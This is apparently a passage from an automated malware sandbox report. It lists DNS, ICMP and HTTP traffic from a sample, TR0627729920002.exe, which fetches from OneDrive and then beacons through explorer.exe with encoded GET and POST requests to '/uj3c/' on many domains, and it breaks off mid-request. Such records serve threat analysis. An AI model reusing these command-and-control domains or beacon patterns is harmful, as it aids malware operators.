                                                                                                Aug 8, 2022 20:16:00.858776093 CEST5856153192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:16:01.909074068 CEST5856153192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:16:03.956007004 CEST5856153192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:16:04.895198107 CEST53585618.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:16:05.042470932 CEST6155553192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:16:05.876121044 CEST53585618.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:16:06.061783075 CEST6155553192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:16:06.926480055 CEST53585618.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:16:07.413911104 CEST6155553192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:16:08.973356962 CEST53585618.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:16:09.431735039 CEST6155553192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:16:10.061058998 CEST53615558.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:16:10.081501007 CEST6443353192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:16:11.081312895 CEST53615558.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:16:11.094490051 CEST6443353192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:16:12.109828949 CEST6443353192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:16:12.433202028 CEST53615558.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:16:14.125829935 CEST6443353192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:16:14.451484919 CEST53615558.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:16:15.101099968 CEST53644338.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:16:16.113787889 CEST53644338.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:16:17.129256964 CEST53644338.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:16:19.145693064 CEST53644338.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:16:21.767999887 CEST5409653192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:16:21.797375917 CEST53540968.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:16:26.877679110 CEST5782953192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:16:26.919265985 CEST53578298.8.8.8192.168.2.3

                                                                                                ICMP Packets

                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                Aug 8, 2022 20:16:05.876243114 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                                                                                Aug 8, 2022 20:16:06.926682949 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                                                                                Aug 8, 2022 20:16:08.973506927 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                                                                                Aug 8, 2022 20:16:11.081469059 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                                                                                Aug 8, 2022 20:16:12.433291912 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                                                                                Aug 8, 2022 20:16:14.451654911 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                                                                                Aug 8, 2022 20:16:16.113898039 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                                                                                Aug 8, 2022 20:16:17.129350901 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                                                                                Aug 8, 2022 20:16:19.146061897 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                Aug 8, 2022 20:12:06.922441006 CEST192.168.2.38.8.8.80x669cStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:12:08.069134951 CEST192.168.2.38.8.8.80x603aStandard query (0)2q5ira.ph.files.1drv.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:12:28.656106949 CEST192.168.2.38.8.8.80xff47Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:12:29.444283962 CEST192.168.2.38.8.8.80x29c9Standard query (0)2q5ira.ph.files.1drv.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:12:41.664526939 CEST192.168.2.38.8.8.80x1b23Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:12:42.633210897 CEST192.168.2.38.8.8.80x7e06Standard query (0)2q5ira.ph.files.1drv.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:13.530627966 CEST192.168.2.38.8.8.80x9a81Standard query (0)www.meigsbuilds.onlineA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:18.930552006 CEST192.168.2.38.8.8.80x198cStandard query (0)www.naturathome.infoA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:24.016206980 CEST192.168.2.38.8.8.80x3325Standard query (0)www.nutricognition.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:29.220875025 CEST192.168.2.38.8.8.80xba55Standard query (0)www.designgamagazine.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:34.659301996 CEST192.168.2.38.8.8.80xb484Standard query (0)www.kidsfundoor.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:39.783365965 CEST192.168.2.38.8.8.80x182aStandard query (0)www.choonchain.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:44.908478022 CEST192.168.2.38.8.8.80x5e17Standard query (0)www.empireapothecary.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:50.639390945 CEST192.168.2.38.8.8.80xada9Standard query (0)www.moneytaoism.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:01.676448107 CEST192.168.2.38.8.8.80x6dabStandard query (0)www.shopwithtrooperdavecom.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:06.960392952 CEST192.168.2.38.8.8.80x64ccStandard query (0)www.6111.siteA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:12.251024008 CEST192.168.2.38.8.8.80xe8d8Standard query (0)www.trendiddas.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:34.505660057 CEST192.168.2.38.8.8.80xe49cStandard query (0)www.trisuaka.xyzA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:39.645056009 CEST192.168.2.38.8.8.80x27cfStandard query (0)www.nomaxdic.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:54.742095947 CEST192.168.2.38.8.8.80xb49cStandard query (0)www.gografic.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:54.765111923 CEST192.168.2.38.8.8.80x9757Standard query (0)www.gografic.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:54.800062895 CEST192.168.2.38.8.8.80x1e0Standard query (0)www.gografic.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:59.877633095 CEST192.168.2.38.8.8.80x762dStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:00.858776093 CEST192.168.2.38.8.8.80x762dStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:01.909074068 CEST192.168.2.38.8.8.80x762dStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:03.956007004 CEST192.168.2.38.8.8.80x762dStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:05.042470932 CEST192.168.2.38.8.8.80x851dStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:06.061783075 CEST192.168.2.38.8.8.80x851dStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:07.413911104 CEST192.168.2.38.8.8.80x851dStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:09.431735039 CEST192.168.2.38.8.8.80x851dStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:10.081501007 CEST192.168.2.38.8.8.80xf5eaStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:11.094490051 CEST192.168.2.38.8.8.80xf5eaStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:12.109828949 CEST192.168.2.38.8.8.80xf5eaStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:14.125829935 CEST192.168.2.38.8.8.80xf5eaStandard query (0)www.huangse5.comA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:21.767999887 CEST192.168.2.38.8.8.80xbc84Standard query (0)www.wellkept.infoA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:26.877679110 CEST192.168.2.38.8.8.80x59a2Standard query (0)www.forummind.comA (IP address)IN (0x0001)

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                Aug 8, 2022 20:12:06.958794117 CEST8.8.8.8192.168.2.30x669cNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                Aug 8, 2022 20:12:06.958794117 CEST8.8.8.8192.168.2.30x669cNo error (0)l-0004.l-dc-msedge.net13.107.43.13A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:12:08.145390987 CEST8.8.8.8192.168.2.30x603aNo error (0)2q5ira.ph.files.1drv.comph-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                                                                Aug 8, 2022 20:12:08.145390987 CEST8.8.8.8192.168.2.30x603aNo error (0)ph-files.fe.1drv.comodc-ph-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                Aug 8, 2022 20:12:28.679950953 CEST8.8.8.8192.168.2.30xff47No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                Aug 8, 2022 20:12:29.500751019 CEST8.8.8.8192.168.2.30x29c9No error (0)2q5ira.ph.files.1drv.comph-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                                                                Aug 8, 2022 20:12:29.500751019 CEST8.8.8.8192.168.2.30x29c9No error (0)ph-files.fe.1drv.comodc-ph-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                Aug 8, 2022 20:12:29.500751019 CEST8.8.8.8192.168.2.30x29c9No error (0)l-0003.l-dc-msedge.net13.107.43.12A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:12:41.684041977 CEST8.8.8.8192.168.2.30x1b23No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                Aug 8, 2022 20:12:41.684041977 CEST8.8.8.8192.168.2.30x1b23No error (0)l-0004.l-dc-msedge.net13.107.43.13A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:12:42.675123930 CEST8.8.8.8192.168.2.30x7e06No error (0)2q5ira.ph.files.1drv.comph-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                                                                Aug 8, 2022 20:12:42.675123930 CEST8.8.8.8192.168.2.30x7e06No error (0)ph-files.fe.1drv.comodc-ph-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:13.662398100 CEST8.8.8.8192.168.2.30x9a81No error (0)www.meigsbuilds.online209.17.116.163A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:18.961222887 CEST8.8.8.8192.168.2.30x198cNo error (0)www.naturathome.infonaturathome.infoCNAME (Canonical name)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:18.961222887 CEST8.8.8.8192.168.2.30x198cNo error (0)naturathome.info81.169.145.158A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:24.035969973 CEST8.8.8.8192.168.2.30x3325No error (0)www.nutricognition.comnutricognition.comCNAME (Canonical name)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:24.035969973 CEST8.8.8.8192.168.2.30x3325No error (0)nutricognition.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:29.246108055 CEST8.8.8.8192.168.2.30xba55No error (0)www.designgamagazine.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:29.246108055 CEST8.8.8.8192.168.2.30xba55No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:29.246108055 CEST8.8.8.8192.168.2.30xba55No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:29.246108055 CEST8.8.8.8192.168.2.30xba55No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:29.246108055 CEST8.8.8.8192.168.2.30xba55No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:29.246108055 CEST8.8.8.8192.168.2.30xba55No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:29.246108055 CEST8.8.8.8192.168.2.30xba55No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:29.246108055 CEST8.8.8.8192.168.2.30xba55No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:34.687539101 CEST8.8.8.8192.168.2.30xb484No error (0)www.kidsfundoor.comkidsfundoor.comCNAME (Canonical name)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:34.687539101 CEST8.8.8.8192.168.2.30xb484No error (0)kidsfundoor.com2.57.90.16A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:39.852020979 CEST8.8.8.8192.168.2.30x182aName error (3)www.choonchain.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:45.086206913 CEST8.8.8.8192.168.2.30x5e17No error (0)www.empireapothecary.com154.55.180.56A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:14:50.809159994 CEST8.8.8.8192.168.2.30xada9No error (0)www.moneytaoism.com156.226.60.131A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:01.709094048 CEST8.8.8.8192.168.2.30x6dabName error (3)www.shopwithtrooperdavecom.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:07.235305071 CEST8.8.8.8192.168.2.30x64ccName error (3)www.6111.sitenonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:12.281902075 CEST8.8.8.8192.168.2.30xe8d8No error (0)www.trendiddas.com5.183.8.187A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:34.530457973 CEST8.8.8.8192.168.2.30xe49cNo error (0)www.trisuaka.xyz188.114.97.3A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:34.530457973 CEST8.8.8.8192.168.2.30xe49cNo error (0)www.trisuaka.xyz188.114.96.3A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:39.959163904 CEST8.8.8.8192.168.2.30x27cfNo error (0)www.nomaxdic.com38.54.163.57A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:54.761399984 CEST8.8.8.8192.168.2.30xb49cName error (3)www.gografic.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:54.796822071 CEST8.8.8.8192.168.2.30x9757Name error (3)www.gografic.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:54.858072996 CEST8.8.8.8192.168.2.30x1e0Name error (3)www.gografic.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:04.895198107 CEST8.8.8.8192.168.2.30x762dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:05.876121044 CEST8.8.8.8192.168.2.30x762dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:06.926480055 CEST8.8.8.8192.168.2.30x762dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:08.973356962 CEST8.8.8.8192.168.2.30x762dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:10.061058998 CEST8.8.8.8192.168.2.30x851dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:11.081312895 CEST8.8.8.8192.168.2.30x851dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:12.433202028 CEST8.8.8.8192.168.2.30x851dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:14.451484919 CEST8.8.8.8192.168.2.30x851dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:15.101099968 CEST8.8.8.8192.168.2.30xf5eaServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:16.113787889 CEST8.8.8.8192.168.2.30xf5eaServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:17.129256964 CEST8.8.8.8192.168.2.30xf5eaServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:19.145693064 CEST8.8.8.8192.168.2.30xf5eaServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:21.797375917 CEST8.8.8.8192.168.2.30xbc84No error (0)www.wellkept.infowellkept.infoCNAME (Canonical name)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:21.797375917 CEST8.8.8.8192.168.2.30xbc84No error (0)wellkept.info15.197.142.173A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:21.797375917 CEST8.8.8.8192.168.2.30xbc84No error (0)wellkept.info3.33.152.147A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:26.919265985 CEST8.8.8.8192.168.2.30x59a2No error (0)www.forummind.comforummind.comCNAME (Canonical name)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:26.919265985 CEST8.8.8.8192.168.2.30x59a2No error (0)forummind.com35.244.105.10A (IP address)IN (0x0001)

                                                                                                HTTP Request Dependency Graph

                                                                                                • onedrive.live.com
                                                                                                • 2q5ira.ph.files.1drv.com
                                                                                                • www.meigsbuilds.online
                                                                                                • www.naturathome.info
                                                                                                • www.nutricognition.com
                                                                                                • www.designgamagazine.com
                                                                                                • www.kidsfundoor.com
                                                                                                • www.empireapothecary.com
                                                                                                • www.moneytaoism.com
                                                                                                • www.trendiddas.com
                                                                                                • www.trisuaka.xyz
                                                                                                • www.nomaxdic.com

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                0192.168.2.34972813.107.43.13443C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                TimestampkBytes transferredDirectionData


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                1192.168.2.34973713.107.43.13443C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                TimestampkBytes transferredDirectionData


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                10192.168.2.3498502.57.90.1680C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Aug 8, 2022 20:14:34.726453066 CEST10084OUTGET /uj3c/?aN68=XPUturKxIt&r4S0P=nXdwAKxpMTcrQ5TaEdKYb/3fLEm5MxmqnP6pt6tXZcCcrT8F9jyrfCLZmxy8K87KDFFG HTTP/1.1
                                                                                                Host: www.kidsfundoor.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Aug 8, 2022 20:14:34.763842106 CEST10084INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 08 Aug 2022 18:14:34 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 146
                                                                                                Connection: close
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                11192.168.2.349851154.55.180.5680C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Aug 8, 2022 20:14:45.330689907 CEST10086OUTGET /uj3c/?aN68=XPUturKxIt&r4S0P=jp9IFxSAbKEUnISDMr23fKSuCkvCee63R6j+FOwVtZA50OWyPGwkYlgwJ8c08P9Q1FY9 HTTP/1.1
                                                                                                Host: www.empireapothecary.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                12192.168.2.349853156.226.60.13180C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Aug 8, 2022 20:14:51.087372065 CEST10095OUTGET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1
                                                                                                Host: www.moneytaoism.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Aug 8, 2022 20:14:51.777698040 CEST10095OUTGET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1
                                                                                                Host: www.moneytaoism.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                13192.168.2.3498555.183.8.18780C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Aug 8, 2022 20:15:12.410327911 CEST10103OUTGET /uj3c/?r4S0P=QpZU5iWZZ+8RnceDxX1N22UuePdp1ta0hAtWyR6NsMGaje0l6aHG9rnjt2nJUX26kpQ0&aN68=XPUturKxIt HTTP/1.1
                                                                                                Host: www.trendiddas.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Aug 8, 2022 20:15:12.639900923 CEST10103INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 08 Aug 2022 18:15:12 GMT
                                                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                                                Content-Length: 280
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 72 65 6e 64 69 64 64 61 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.trendiddas.com Port 80</address></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                14192.168.2.349856188.114.97.380C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Aug 8, 2022 20:15:34.555059910 CEST10105OUTPOST /uj3c/ HTTP/1.1
                                                                                                Host: www.trisuaka.xyz
                                                                                                Connection: close
                                                                                                Content-Length: 411
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.trisuaka.xyz
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://www.trisuaka.xyz/uj3c/
                                                                                                Accept-Language: en-US
                                                                                                Accept-Encoding: gzip, deflate
                                                                                                Data Raw: 72 34 53 30 50 3d 75 46 58 50 6c 74 76 33 4f 4d 4b 75 6e 6c 37 76 54 46 38 4a 53 54 77 37 6f 43 6f 49 44 67 48 44 39 55 52 66 4b 49 63 49 53 4a 63 59 74 76 61 54 56 79 59 41 61 2d 4d 4d 51 52 33 75 66 65 45 55 70 39 63 54 4e 33 6f 76 4a 46 39 6c 65 53 38 68 64 74 76 63 58 45 64 54 31 43 7a 6b 37 43 46 69 44 34 30 39 52 44 4c 72 61 4f 4e 78 71 48 49 43 78 38 61 58 34 34 71 33 4c 5f 46 5a 48 6a 41 75 55 38 55 48 73 65 6b 63 6f 66 66 66 54 30 70 39 35 57 6c 73 50 70 4d 5a 6e 4e 56 52 52 7a 77 73 78 6a 57 52 64 6c 36 6c 70 49 6c 44 39 6b 76 38 61 73 57 61 4a 6c 32 78 53 67 6d 70 69 44 53 65 76 78 4e 51 6e 59 50 58 65 6e 6b 39 4c 56 66 52 59 4d 77 49 28 65 36 42 66 6d 71 2d 4d 66 59 4c 63 77 69 79 35 47 54 4f 4a 6c 34 65 38 48 37 74 49 62 28 69 45 4b 69 77 37 6d 6b 79 58 62 46 74 4d 57 37 74 38 53 41 56 42 6a 4e 53 70 6b 76 6e 50 58 61 6e 70 4f 75 59 76 33 6e 6e 37 41 5a 53 63 37 34 6e 4f 38 70 62 63 48 79 53 65 52 63 5a 65 53 78 52 67 6a 67 32 74 42 62 75 4f 79 47 4b 52 6a 45 70 75 54 32 62 33 6e 6c 74 65 63 31 46 37 51 4e 73 33 52 43 68 66 7a 51 53 31 47 38 61 44 31 72 59 65 6c 56 6e 4c 54 58 5f 37 48 52 71 39 4a 42 73 4d 4e 5a 30 32 61 35 7a 39 6d 41 54 52 56 69 58 44 6a 33 77 77 70 62 56 78 66 43 4e 6a 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                Data Ascii: r4S0P=uFXPltv3OMKunl7vTF8JSTw7oCoIDgHD9URfKIcISJcYtvaTVyYAa-MMQR3ufeEUp9cTN3ovJF9leS8hdtvcXEdT1Czk7CFiD409RDLraONxqHICx8aX44q3L_FZHjAuU8UHsekcofffT0p95WlsPpMZnNVRRzwsxjWRdl6lpIlD9kv8asWaJl2xSgmpiDSevxNQnYPXenk9LVfRYMwI(e6Bfmq-MfYLcwiy5GTOJl4e8H7tIb(iEKiw7mkyXbFtMW7t8SAVBjNSpkvnPXanpOuYv3nn7AZSc74nO8pbcHySeRcZeSxRgjg2tBbuOyGKRjEpuT2b3nltec1F7QNs3RChfzQS1G8aD1rYelVnLTX_7HRq9JBsMNZ02a5z9mATRViXDj3wwpbVxfCNjQ).


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                15192.168.2.349857188.114.97.380C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Aug 8, 2022 20:15:34.577404976 CEST10118OUTPOST /uj3c/ HTTP/1.1
                                                                                                Host: www.trisuaka.xyz
                                                                                                Connection: close
                                                                                                Content-Length: 36479
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.trisuaka.xyz
